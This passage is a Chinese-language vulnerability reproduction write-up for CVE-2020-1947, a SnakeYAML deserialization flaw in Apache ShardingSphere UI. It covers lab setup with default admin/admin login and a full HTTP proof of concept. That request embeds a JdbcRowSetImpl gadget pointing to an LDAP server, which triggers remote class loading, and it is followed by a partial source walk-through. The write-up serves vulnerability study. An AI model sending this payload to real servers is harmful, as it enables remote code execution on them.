## CVE-2020-1947 复现及分析
## 0x01 影响
Apache ShardingSphere < =4.0.0
### 0x02 环境搭建
[incubator-shardingsphere](https://github.com/apache/incubator-shardingsphere) 的ui界面为前后分离,所以搭建环境所需要的工具如下
* [shardingsphere-ui-frontend](https://github.com/apache/incubator-shardingsphere/tree/master/shardingsphere-ui/shardingsphere-ui-frontend) 需要nodejs环境
* [shardingsphere-ui-backend](https://github.com/apache/incubator-shardingsphere/tree/master/shardingsphere-ui/shardingsphere-ui-backend) maven构建环境,idea作为源码调试工具
* 任意版本zookeeper
前端后端没有启动的先后顺序,任意顺序即可。
首先将[shardingsphere-ui-frontend](https://github.com/apache/incubator-shardingsphere/tree/master/shardingsphere-ui/shardingsphere-ui-frontend) 拖入idea,idea会自动通过pom的依赖构建项目,稍等片刻,在`org.apache.shardingsphere.ui.Bootstrap`类运行main函数即可。
前端环境需要nodejs构建,步骤如下
1. 进入`sharding-ui-frontend/`目录;
2. 执行`npm install`;
3. 执行`npm run dev`;
4. 访问`http://localhost:8080/`。
现在就可以访问后台了,用户名与密码皆为admin。为了触发漏洞,需要在后台配置zookeeper。如图
### 0x03 POC
登录后台后,发送如下poc
```
POST /api/schema HTTP/1.1
Host: localhost:8089
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Access-Token: 替换为自己的
Content-Length: 579
{"name":"CVE-2020-1947","ruleConfiguration":" encryptors:\n encryptor_aes:\n type: aes\n props:\n aes.key.value: 123456abc\n encryptor_md5:\n type: md5\n tables:\n t_encrypt:\n columns:\n user_id:\n plainColumn: user_plain\n cipherColumn: user_cipher\n encryptor: encryptor_aes\n order_id:\n cipherColumn: order_cipher\n encryptor: encryptor_md5","dataSourceConfiguration":"!!com.sun.rowset.JdbcRowSetImpl\n dataSourceName: ldap://127.0.0.1:1389/CommandObject\n autoCommit: true"}
```
### 0x04 分析
可以根据poc,可以很明显的发现是shakeyaml引起的反序列化问题。首先找到处理`/api/scheme`的controller。在`org.apache.shardingsphere.ui.web.controller.ShardingSchemaController`处。`addSchema`会处理post请求
```java
/**
* Add schema configuration.
*
* @param shardingSchema sharding schema DTO.
* @return response result
*/
@RequestMapping(value = "", method = RequestMethod.POST)
public ResponseResult addSchema(final @RequestBody ShardingSchemaDTO shardingSchema) {
shardingSchemaService.addSchemaConfiguration(shardingSchema.getName(), shardingSchema.getRuleConfiguration(), shardingSchema.getDataSourceConfiguration());
return ResponseResultUtil.success();
}
```
跟入`shardingSchemaService.addSchemaConfiguration`函数。
```java
@Override
public void addSchemaConfiguration(final String schemaName, final String ruleConfiguration, final String dataSourceConfiguration) {
checkSchemaName(schemaName, getAllSchemaNames());
checkRuleConfiguration(ruleConfiguration);
checkDataSourceConfiguration(dataSourceConfiguration);
//... 省略不相关代码
}
```
在`addSchemaConfiguration`中的`checkDataSourceConfiguration`函数会处理`dataSourceConfiguration`。继续跟入
```java
private void checkDataSourceConfiguration(final String configData) {
Map
